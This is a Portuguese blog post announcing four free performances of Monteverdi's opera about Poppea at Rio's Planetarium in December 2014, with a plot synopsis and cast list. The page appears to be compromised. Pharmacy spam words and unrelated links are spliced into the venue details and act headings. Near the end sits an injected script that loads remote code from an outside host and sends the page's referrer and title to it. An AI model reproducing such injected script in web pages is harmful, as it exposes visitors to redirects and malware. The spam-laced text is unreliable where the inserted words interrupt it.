ÓperaProgramaçãoRio de Janeiro

“A coroação de Popeia”, de Monteverdi

Ópera barroca, pela primeira vez no Brasil, estreia no Planetário do Rio com 4 récitas gratuitas.

 

SERVIÇO
tadalafil calox

 

 

Planetário do Rio de Janeiro – Cúpula Carl Sagan http://bosnakirtasiye.com/2018/02/02/avana-westside-prices/ http://www.chanseul.com/archives/4861
Rua Vice Governador Rubens Berardo, 100 – Gávea, Rio de Janeiro
Pills Informações: (21) 3251-3456

Dias 10, 11, 12 e 13 de dezembro de 2014 às 20 horas.

Entrada franca

 

 

A ópera barroca “A Coroação de Popeia” (L’incoronazione di Poppea), de Claudio Monteverdi com libreto de Giovanni Busenello, será apresentada pela primeira vez no Brasil dia 10 de dezembro, na cúpula do Planetário do Rio de Janeiro. Estreada em 1643, é a última e a mais famosa das dezoito óperas compostas por Monteverdi. Trata-se também de um marco histórico: é a primeira ópera baseada em personagens reais e não apenas em figuras mitológicas. Relata um fato verídico: a paixão de Nero pela amante, que o leva a se livrar de sua esposa Otávia e fazer de Popeia a nova imperatriz.

O elenco reúne profissionais consagrados e também cantores líricos em início de carreira, dispostos a ganhar experiência de palco em montagens operísticas. A montagem na verdade, é resultado de um “Opera Studio”, modalidade de treinamento para cantores líricos utilizada em larga escala na Europa e Estados Unidos, e que agora começa a se desenvolver no Brasil. Nesse modelo, artistas profissionais e novatos estudam juntos uma determinada obra, que em seguida é montada e apresentada ao público.

Geralmente a direção cênica e musical, além dos principais papeis, são assumidos por artistas tarimbados e de renome. “A Coroação de Popeia” tem direção cênica da consagrada mezzosoprano chilena Graciela Araya, regência e direção musical de Vitor Philomeno e direção geral de Mirna Rubim. Entre os artistas convidados, destacam-se as sopranos Tati Helene e  Marília Zangrandi, e os contratenores Sergio Anders e Dannilu. Outro destaque é a volta Eunice Rubim aos palcos cariocas, cantando o papel de Arnalta.

Trata-se de um trabalho emocionante Pills ”, diz a soprano Tati Helene, convidada para cantar o papel de Popeia na estreia e na última récita da temporada. “Vamos mostrar ao Brasil, pela primeira vez, uma das peças mais importantes e mais bonitas do repertório operístico. E o prazer de compartilhar nossa experiência com colegas em início de carreira é indescritível”, ressalta.

“A Coroação de Popeia” é produzida pelo Estudio VOCE. As récitas acontecem nos dias 10, 11, 12 e 13 de dezembro, todas às 20 horas e com ingressos gratuitos.

 

Resumo da Ópera

Cheap Prólogo

As figuras da Fortuna, da Virtude e do Amor debatem qual das três tem maior poder sobre a humanidade. O Amor se diz o mais poderoso e justifica seu argumento contando a seguinte história:

Purchase 1º Ato

Estamos em Roma, por volta do ano de 55 d.C. Otão regressa da guerra e descobre que a sua mulher Popeia, jovem bela e ardilosa, trocou-o pelo tirânico imperador Nero. Apesar dos sábios conselhos do filósofo Sêneca, Nero resolve livrar-se da sua mulher Otávia e fazer de Popeia a nova imperatriz. Otávia pede ajuda a Sêneca, antigo professor de Nero, que a ajude junto ao Senado. Ele atende: faz um discurso no Senado onde expõe a decadência da nobreza e pede explicações a Nero sobre a sua conduta indecorosa. Irascível, o Imperador corta relações com Sêneca. Por sua vez, Otão, movido pelos ciúmes, desabafa com Drusila, uma senhora da corte que está apaixonada por ele. Otão quer ver Popeia punida.

2º Ato

No início do segundo ato, Mercúrio anuncia a morte iminente de Sêneca. O filósofo, por não aprovar a conduta do seu antigo discípulo, passa a ser considerado incômodo. É abordado por um membro da guarda imperial que lhe leva uma ordem de Nero: Sêneca deve suicidar-se. Os amigos do filósofo tentam convencê-lo a fugir, mas Sêneca se recusa e cumpre as ordens do imperador.

Otão insiste em se vingar de Popeia. É abordado pela imperatriz Otávia que, obviamente o apoia, fazendo despertar nele um desejo de vingança ainda maior. Popeia merece realmente a morte por tal ultraje. Otão pede ajuda a Drusila que lhe empresta suas roupas para ele se disfarçar.

Nos seus aposentos, Popeia já se sente imperatriz. Arnalta, mãe de Popeia, adverte-a para o desejo desenfreado de poder e tenta adormecê-la. É assim que Otão entra no quarto da sua ex-mulher para levar a cabo o assassinato. Quando se prepara para matar Popeia, esta é acordada pela figura do Amor que assim evita o assassinato.

3 Buy º Ato

O plano de Otão e Drusila foi frustrado. O terceiro ato começa com a prisão de Drusila. Diante os interrogadores, ela assume todo o plano por amor a Otão, o que o leva a confessar a sua culpa e a declarar que também ama Drusila.

Otão, Drusila e Otávia são condenados ao exílio pelo imperador. Depois disto, Nero e Popeia têm finalmente caminho livre para se casarem. Octavia despede-se de Roma e Popeia é coroada imperatriz.

 

Ficha técnica

Direção Geral: Mirna Rubim
– Direção Musical: Vitor Philomeno
– Direção Cênica: Graciela Araya

 

Elenco

– Poppea: Tati Helene * (dias 10 e 13) / Marília Zangrandi (dias 11 e 12)
– Nerone: Dannilu * (dias 10 e 11) / Sergio Anders * (dias 12 e 13)
– Ottone: Cintia Graton (Participação Especial)
– Ottavia: Mirna Rubim (Participação especial, dias 10 e 13) / Simone Ferreira Chaves (dias 11 e 12)
– Arnalta: Eunice Rubim (Participação especial)
– Drusilla: Natalia Trigo (Dias 10 e 11) / Marina Cyrino (dias 12 e 13)
– Venere: Marina Cyrino
– Sêneca: Flávio Lauria
– Virtù/Pallade: Paula Migueles Berwanger
– Amor: Fernanda Conde
– Fortuna/Damigella: Alessandra Quintes
– Nutrice/Famigliari I: Priscilla Lacerda
– Soldato II/Famigliari II/Lucano: Pedro Fernando
– Soldato I/Liberto/Console: Roberto Montezuma
– Mercurio/Famigliari III/Tribuno/Littore: Marcos Viestel/ Ricardo Abreu
– Valletto: Isabela Vieira

(*) Artistas convidados

 

Ensemble

Violinos Barrocos: Roger Lagr e Nichola Dittrich Viggiano
– Viola da Gamba: Kristina Augustin
– Teorba: Bruno Correia
– Cravo: Vitor Philomeno

 

Trecho da ópera: “pur ti miro, pur ti godo” (Jaroussky / De Niese)
[youtube]https://www.youtube.com/watch?v=_isL0E-4TsQ[/youtube]

 d.getElementsByTagName(‘head’)[0].appendChild(s);s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.